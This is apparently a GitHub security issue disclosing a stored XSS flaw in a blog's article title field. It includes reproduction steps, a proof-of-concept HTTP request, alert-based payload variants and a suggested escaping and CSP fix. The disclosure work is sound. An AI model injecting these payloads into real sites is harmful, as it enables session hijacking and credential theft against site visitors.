[Security] Stored XSS Vulnerability in Article Title Field (articleTitle) - v2.6.4-stable

## Security Vulnerability Report

**Type:** Stored Cross-Site Scripting (XSS)  
**Severity:** High  
**Affected Version:** v2.6.4-stable  
**Affected Endpoint:** `POST /console/article/`  
**Affected Parameter:** `articleTitle`  

---

## Description

A stored XSS vulnerability exists in the article creation functionality. 
The `articleTitle` parameter is not sanitized before being stored in the 
database, causing the malicious payload to execute in the browser of every 
user who visits the affected article.

---

## Steps to Reproduce

1. Login to the admin panel
2. Navigate to the article creation page: `http://[host]/admin-index.do#article/article`
3. Enter the following payload in the **Title** field:`<img src=1 onerror=alert(1)>`

<img width="1920" height="1070" alt="Image" src="https://github.com/user-attachments/assets/f2214b91-0348-428e-beb2-923c2ccb97c2" />

4.  Click the **Publish** button 



5. Visit the published article — the XSS payload executes

<img width="692" height="390" alt="Image" src="https://github.com/user-attachments/assets/603358dd-f5d9-4c8c-a732-8c7412c5c63b" />

<img width="692" height="392" alt="Image" src="https://github.com/user-attachments/assets/47f5f7ff-4fbf-41f2-b577-ddea605c3fce" />

HTTP Request (PoC)

```
POST /console/article/ HTTP/1.1
Host: localhost:8080
Cookie:solo=[your_session_cookie]
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

{"article":{"articleTitle":"<img src=1 onerror=alert(1)>","articleContent":"<img src=1 onerror=alert(1)>\n\n\n","articleAbstract":"<img src=1 onerror=alert(1)>\n\n\n","articleTags":"","articlePermalink":"","articleStatus":0,"articleSignId":"1","postToCommunity":false,"articleCommentable":true,"articleViewPwd":"","category":""}}
```

## Payload Variants

```
<img src=1 onerror=alert(1)>
<svg onload=alert('XSS')>
<script>alert(document.domain)</script>
```

---

## Impact

- All visitors of the affected article trigger the payload without any additional interaction
- Session hijacking via cookie theft
- Credential harvesting through injected fake login forms
- Administrative actions executed in admin context

---

## Suggested Fix

```java
articleTitle = StringEscapeUtils.escapeHtml4(articleTitle);
```

Add security headers:
```
Content-Security-Policy: default-src 'self'; script-src 'self'
X-XSS-Protection: 1; mode=block
```

---

## References

- [CWE-79: Cross-site Scripting](https://cwe.mitre.org/data/definitions/79.html)
- [OWASP XSS Prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

---

*This issue is reported for responsible disclosure purposes.*

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

[Security] Stored XSS Vulnerability in Article Title Field (articleTitle) - v2.6.4-stable #330

Security Vulnerability Report

Description

Steps to Reproduce

Payload Variants

Impact

Suggested Fix

References

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Uh oh!

Uh oh!

[Security] Stored XSS Vulnerability in Article Title Field (articleTitle) - v2.6.4-stable #330

Description

Security Vulnerability Report

Description

Steps to Reproduce

Payload Variants

Impact

Suggested Fix

References

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions